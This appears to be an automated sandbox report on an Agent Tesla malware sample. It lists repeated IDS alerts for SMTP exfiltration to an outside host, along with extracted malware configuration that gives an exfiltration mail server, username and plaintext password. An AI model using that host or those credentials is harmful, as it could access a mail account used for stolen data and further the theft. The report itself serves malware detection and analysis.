Timestamp:	07/01/24-20:28:55.662732
SID:	2851779
Source Port:	49751
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:54.008944
SID:	2855542
Source Port:	49744
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:49.212686
SID:	2851779
Source Port:	49743
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:20.588265
SID:	2840032
Source Port:	49754
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:17.781472
SID:	2851779
Source Port:	49747
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Exfil via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:25:22.036965
SID:	2855245
Source Port:	49731
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:25:22.036854
SID:	2030171
Source Port:	49731
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:36.709148
SID:	2840032
Source Port:	49742
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:55.662732
SID:	2855542
Source Port:	49751
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:17.781472
SID:	2855542
Source Port:	49747
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:11.831875
SID:	2030171
Source Port:	49753
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:20.587012
SID:	2851779
Source Port:	49754
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:10.465136
SID:	2855542
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:36.708969
SID:	2030171
Source Port:	49742
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:22.436606
SID:	2855542
Source Port:	49740
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:25:22.036965
SID:	2840032
Source Port:	49731
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:10.465136
SID:	2030171
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:55.662771
SID:	2840032
Source Port:	49751
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:54.008944
SID:	2851779
Source Port:	49744
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:15.672815
SID:	2851779
Source Port:	49746
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:01.279510
SID:	2030171
Source Port:	49745
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:25:22.036965
SID:	2851779
Source Port:	49731
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:01.279625
SID:	2840032
Source Port:	49745
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:10.465306
SID:	2840032
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:49.212686
SID:	2855542
Source Port:	49743
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:55.662704
SID:	2030171
Source Port:	49751
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:15.672815
SID:	2855542
Source Port:	49746
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:22.436606
SID:	2851779
Source Port:	49740
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:11.831915
SID:	2851779
Source Port:	49753
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:36.337233
SID:	2030171
Source Port:	49748
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:07.465085
SID:	2855542
Source Port:	49752
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:20.587012
SID:	2030171
Source Port:	49754
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:54.008911
SID:	2030171
Source Port:	49744
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:01.279551
SID:	2851779
Source Port:	49745
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:36.337328
SID:	2840032
Source Port:	49748
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:36.709124
SID:	2855542
Source Port:	49742
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:07.465136
SID:	2840032
Source Port:	49752
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:25:22.036965
SID:	2855542
Source Port:	49731
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:22.436582
SID:	2030171
Source Port:	49740
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:01.279551
SID:	2855542
Source Port:	49745
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:54.008982
SID:	2840032
Source Port:	49744
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:11.831915
SID:	2855542
Source Port:	49753
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:17.781450
SID:	2030171
Source Port:	49747
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:07.465085
SID:	2851779
Source Port:	49752
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:17.783319
SID:	2840032
Source Port:	49747
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:49.212618
SID:	2030171
Source Port:	49743
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:36.337328
SID:	2855542
Source Port:	49748
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:11.831952
SID:	2840032
Source Port:	49753
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:22.436734
SID:	2840032
Source Port:	49740
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:36.337328
SID:	2851779
Source Port:	49748
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:36.709124
SID:	2851779
Source Port:	49742
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:07.465069
SID:	2030171
Source Port:	49752
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:15.672800
SID:	2030171
Source Port:	49746
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:29:20.587012
SID:	2855542
Source Port:	49754
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:49.212736
SID:	2840032
Source Port:	49743
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fasmacopy.gr", "Username": "info@fasmacopy.gr", "Password": "Fam28sjd"}

Multi AV Scanner detection for submitted file

Source: GkYUK8VCrO.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: GkYUK8VCrO.exe

Joe Sandbox ML: detected

Source: GkYUK8VCrO.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692054040.0000000003900000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692800812.0000000003760000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692054040.0000000003900000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692800812.0000000003760000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B04696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B04696
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B0C9C7
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0C93C FindFirstFileW,FindClose,	0_2_00B0C93C
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0F200
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0F35D
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0F65E
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B03A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B03A2B
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B03D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B03D4E
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0BF27

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49731 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49731 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49731 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49731 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49731 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49739 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49739 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49739 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49739 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49740 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49740 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49740 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49740 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49742 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49742 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49742 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49742 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49743 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49743 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49743 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49743 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49744 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49744 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49744 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49744 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49745 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49745 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49745 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49745 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49746 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49746 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49746 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49746 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49747 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49747 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49747 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49747 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49748 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49748 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49748 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49748 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49751 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49751 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49751 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49751 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49752 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49752 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49752 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49752 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49753 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49753 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49753 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49753 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49754 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49754 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49754 -> 79.170.44.32:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49754 -> 79.170.44.32:587

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 79.170.44.32:587

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 79.170.44.32 79.170.44.32

Source: Joe Sandbox View

ASN Name: GODADDYDE GODADDYDE

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 79.170.44.32:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B125E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00B125E2

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.fasmacopy.gr

Source: RegSvcs.exe, 00000003.00000002.4151126152.00000000034DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.000000000369F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.0000000003580000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.000000000373D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.0000000003959000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.fasmacopy.gr
